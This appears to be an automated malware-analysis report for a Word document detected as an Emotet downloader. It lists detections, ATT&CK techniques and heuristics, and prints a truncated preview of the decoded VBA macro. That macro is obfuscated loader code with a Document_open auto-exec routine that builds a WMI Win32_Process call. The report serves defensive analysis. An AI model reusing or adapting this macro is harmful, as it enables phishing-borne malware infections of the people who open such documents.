MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7443840-1', indicating it's a downloader for the Emotet family. High-severity heuristics confirm the presence of a VBA macro with a 'Document_Open' auto-execution routine that uses 'CreateObject', a common technique for executing malicious code. The VBA macro is heavily obfuscated, but its presence and the associated heuristics strongly suggest it's designed to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-7443840-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7443840-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6806 bytes |
SHA-256: 82daf0565dd08e7a55622b6ad9c3a3a2c2fffefbd3f448a0028777dcbb5c7498 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Hsheolxjq"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Oqtpvnezgruyv, 0, 0, MSForms, TextBox"
Private Sub Document_open()
If Itzrwjrpbumny < Fjnugjvfmlgol Then
Dbpyyfbxqq = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Xupnpdwszq = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
If Xsgujaymdy < Nywmziymqqaa Then
Bhzyruhup = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Uzzlejhiktpip = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
If Wydlxhuc < Rofqjxburt Then
Dxmobnixc = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Glchrcmmw = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Wipqofqtwf
End Sub
Attribute VB_Name = "Ytxatmhtmzwws"
Attribute VB_Base = "0{7877343A-A91B-4E70-BD18-4B92B01BE467}{8D35FCA3-B952-434F-B145-8CBE4F265D74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Gwgukvssw"
Function Afsynwxyikrvn()
If Wjkynqyyb < Gsxabfzdakr Then
Oghsyrpm = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Uxmovbtfqrd = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Yckvqopj = Hsheolxjq.Oqtpvnezgruyv
If Nnmcllqjuz < Xrejsbpwyfblx Then
Iewyfeqwkxvfh = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Oqkelraewf = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Wskkshmhqed = Yckvqopj + Ytxatmhtmzwws.Qgmqoung + Ytxatmhtmzwws.Wjskmglqazj + Ytxatmhtmzwws.Qmvoiabe
If Ghrxlavejfi < Ajovhxyug Then
Ixthaabok = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Bmrlqfxaccxz = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Gwmuaxwh = Wskkshmhqed + Ytxatmhtmzwws.Zoqfwpvlhox + Ytxatmhtmzwws.Ivioppxdi
If Bawbcohv < Hrpahbig Then
Txfzlkuzs = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Cidjyhdwfnlxo = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Afsynwxyikrvn = Tlijpoegl + Gwmuaxwh + Tlijpoegl
If Daoepmfjsejlz < Xsitajmxys Then
Bjudqfio = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Zsrckyciba = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
End Function
Function Wipqofqtwf()
If Xxtfqwynmubwn < Rlfpczuwvqcz Then
Ximtldtvdnc = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin(4) * 7 + CBool(xUQE)
BfCa54O = KTRo * RlRn7Xx / CetB632 + Uwub6
ElseIf njT = DQQV Then
Pnyzjbcbs = 1 - Sqr(rNQh0G03) * wWxj6h9 - CDate(nkcF6 - CSng(pbWY))
End If
Drvuxxgds = E + "wi" + "n" + f + "mgmt" + g + "s:Win32_P" + n + "rocess"
If Aeytrhpndgn < Xzivaxvjdc Then
Ggtzrlsoszyh = 59 * CSng(81) / LjTE * Fix(ddGI1 * CStr(3)) / 4 * Sin
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.